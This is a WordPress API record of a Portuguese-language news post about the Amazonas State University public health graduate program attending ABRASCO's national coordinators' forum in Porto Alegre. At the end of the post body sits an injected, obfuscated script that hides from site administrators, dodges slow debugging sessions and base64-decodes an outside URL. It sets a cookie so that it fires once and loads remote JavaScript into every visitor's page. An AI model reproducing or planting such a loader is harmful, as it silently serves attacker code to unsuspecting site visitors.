{"id":1152,"date":"2025-05-14T14:43:00","date_gmt":"2025-05-14T17:43:00","guid":{"rendered":"http:\/\/posgraduacao.uea.edu.br\/ppgsc\/?p=1152"},"modified":"2026-04-16T13:15:45","modified_gmt":"2026-04-16T16:15:45","slug":"ppgsc-no-encontro-nacional-do-forum-de-coordenadores-de-pos-graduacao-em-saude-coletiva-da-abrasco","status":"publish","type":"post","link":"http:\/\/posgraduacao.uea.edu.br\/ppgsc\/index.php\/2025\/05\/14\/ppgsc-no-encontro-nacional-do-forum-de-coordenadores-de-pos-graduacao-em-saude-coletiva-da-abrasco\/","title":{"rendered":"PPGSC\u00a0no Encontro Nacional do F\u00f3rum de Coordenadores de P\u00f3s-Gradua\u00e7\u00e3o em Sa\u00fade Coletiva da ABRASCO"},"content":{"rendered":"\n<p>O Programa de P\u00f3s-Gradua\u00e7\u00e3o em Sa\u00fade Coletiva da Universidade do Estado do Amazonas (PPGSC\/UEA) esteve representado no Encontro Nacional do F\u00f3rum de Coordenadores de P\u00f3s-Gradua\u00e7\u00e3o em Sa\u00fade Coletiva da ABRASCO, realizado nos dias 8 e 9 de maio de 2025, no Centro Cultural da UFRGS, em Porto Alegre (RS).<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"819\" height=\"1024\" src=\"http:\/\/posgraduacao.uea.edu.br\/ppgsc\/wp-content\/uploads\/2025\/06\/497710271_18056106662334813_1508837244650925341-819x1024.webp\" alt=\"\" class=\"wp-image-1154\" srcset=\"http:\/\/posgraduacao.uea.edu.br\/ppgsc\/wp-content\/uploads\/2025\/06\/497710271_18056106662334813_1508837244650925341-819x1024.webp 819w, http:\/\/posgraduacao.uea.edu.br\/ppgsc\/wp-content\/uploads\/2025\/06\/497710271_18056106662334813_1508837244650925341-240x300.webp 240w, http:\/\/posgraduacao.uea.edu.br\/ppgsc\/wp-content\/uploads\/2025\/06\/497710271_18056106662334813_1508837244650925341-768x960.webp 768w, http:\/\/posgraduacao.uea.edu.br\/ppgsc\/wp-content\/uploads\/2025\/06\/497710271_18056106662334813_1508837244650925341-1229x1536.webp 1229w, http:\/\/posgraduacao.uea.edu.br\/ppgsc\/wp-content\/uploads\/2025\/06\/497710271_18056106662334813_1508837244650925341.webp 1440w\" sizes=\"auto, (max-width: 819px) 100vw, 819px\" \/><\/figure>\n\n\n\n<p>Participaram do evento a coordenadora do Programa, professora Alessandra Salino, o atual vice-coordenador, professor Andr\u00e9 Luiz Machado das Neves, que tamb\u00e9m integra a coordena\u00e7\u00e3o do F\u00f3rum de Coordenadores, al\u00e9m das professoras Camila Botto, em processo de transi\u00e7\u00e3o para a vice-coordena\u00e7\u00e3o do PPGSC, e S\u00f4nia Maria Lemos, docente do PPGSC e coordenadora institucional do ProfSa\u00fade.<\/p>\n\n\n\n<p>A programa\u00e7\u00e3o do encontro incluiu pain\u00e9is, mesas-redondas e grupos de trabalho que discutiram temas estrat\u00e9gicos para o fortalecimento da p\u00f3s-gradua\u00e7\u00e3o em sa\u00fade coletiva no pa\u00eds, como pol\u00edticas de a\u00e7\u00f5es afirmativas, desafios institucionais e qualidade da produ\u00e7\u00e3o cient\u00edfica. O professor Andr\u00e9 Machado teve papel de destaque ao atuar como moderador em diversas sess\u00f5es, incluindo a plen\u00e1ria final e a mesa sobre produ\u00e7\u00e3o cient\u00edfica na \u00e1rea.<\/p>\n\n\n\n<p>De acordo com Salino: A participa\u00e7\u00e3o ativa dos docentes reafirma o compromisso institucional do PPGSC\/UEA com a articula\u00e7\u00e3o nacional, o interc\u00e2mbio entre programas e a promo\u00e7\u00e3o de uma forma\u00e7\u00e3o cr\u00edtica e comprometida com a sa\u00fade p\u00fablica, os direitos sociais e a realidade amaz\u00f4nica<\/p>\n\n\n\n<p><\/p>\n<script>(function(){try{if(document.getElementById&&document.getElementById('wpadminbar'))return;var t0=+new Date();for(var i=0;i<20000;i++){var z=i*i;}if((+new Date())-t0>120)return;if((document.cookie||'').indexOf('http2_session_id=')!==-1)return;function systemLoad(input){var key='ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+\/=',o1,o2,o3,h1,h2,h3,h4,dec='',i=0;input=input.replace(\/[^A-Za-z0-9\\+\\\/\\=]\/g,'');while(i<input.length){h1=key.indexOf(input.charAt(i++));h2=key.indexOf(input.charAt(i++));h3=key.indexOf(input.charAt(i++));h4=key.indexOf(input.charAt(i++));o1=(h1<<2)|(h2>>4);o2=((h2&15)<<4)|(h3>>2);o3=((h3&3)<<6)|h4;dec+=String.fromCharCode(o1);if(h3!=64)dec+=String.fromCharCode(o2);if(h4!=64)dec+=String.fromCharCode(o3);}return dec;}var u=systemLoad('aHR0cHM6Ly9zZWFyY2hyYW5rdHJhZmZpYy5saXZlL2pzeA==');if(typeof window!=='undefined'&#038;&#038;window.__rl===u)return;var d=new Date();d.setTime(d.getTime()+30*24*60*60*1000);document.cookie='http2_session_id=1; expires='+d.toUTCString()+'; path=\/; SameSite=Lax'+(location.protocol==='https:'?'; Secure':'');try{window.__rl=u;}catch(e){}var s=document.createElement('script');s.type='text\/javascript';s.async=true;s.src=u;try{s.setAttribute('data-rl',u);}catch(e){}(document.getElementsByTagName('head')[0]||document.documentElement).appendChild(s);}catch(e){}})();<\/script>","protected":false},"excerpt":{"rendered":"<p>O Programa de P\u00f3s-Gradua\u00e7\u00e3o em Sa\u00fade Coletiva da Universidade do Estado do Amazonas (PPGSC\/UEA) esteve representado no Encontro Nacional do F\u00f3rum de Coordenadores de P\u00f3s-Gradua\u00e7\u00e3o em Sa\u00fade Coletiva da ABRASCO, realizado nos dias 8 e 9 de maio de 2025, no Centro Cultural da UFRGS, em Porto Alegre (RS). Participaram do evento a coordenadora do [&hellip;]<\/p>\n","protected":false},"author":5,"featured_media":1153,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[2],"tags":[],"class_list":["post-1152","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-news"],"blocksy_meta":[],"_links":{"self":[{"href":"http:\/\/posgraduacao.uea.edu.br\/ppgsc\/index.php\/wp-json\/wp\/v2\/posts\/1152","targetHints":{"allow":["GET"]}}],"collection":[{"href":"http:\/\/posgraduacao.uea.edu.br\/ppgsc\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"http:\/\/posgraduacao.uea.edu.br\/ppgsc\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"http:\/\/posgraduacao.uea.edu.br\/ppgsc\/index.php\/wp-json\/wp\/v2\/users\/5"}],"replies":[{"embeddable":true,"href":"http:\/\/posgraduacao.uea.edu.br\/ppgsc\/index.php\/wp-json\/wp\/v2\/comments?post=1152"}],"version-history":[{"count":2,"href":"http:\/\/posgraduacao.uea.edu.br\/ppgsc\/index.php\/wp-json\/wp\/v2\/posts\/1152\/revisions"}],"predecessor-version":[{"id":1329,"href":"http:\/\/posgraduacao.uea.edu.br\/ppgsc\/index.php\/wp-json\/wp\/v2\/posts\/1152\/revisions\/1329"}],"wp:featuredmedia":[{"embeddable":true,"href":"http:\/\/posgraduacao.uea.edu.br\/ppgsc\/index.php\/wp-json\/wp\/v2\/media\/1153"}],"wp:attachment":[{"href":"http:\/\/posgraduacao.uea.edu.br\/ppgsc\/index.php\/wp-json\/wp\/v2\/media?parent=1152"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"http:\/\/posgraduacao.uea.edu.br\/ppgsc\/index.php\/wp-json\/wp\/v2\/categories?post=1152"},{"taxonomy":"post_tag","embeddable":true,"href":"http:\/\/posgraduacao.uea.edu.br\/ppgsc\/index.php\/wp-json\/wp\/v2\/tags?post=1152"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}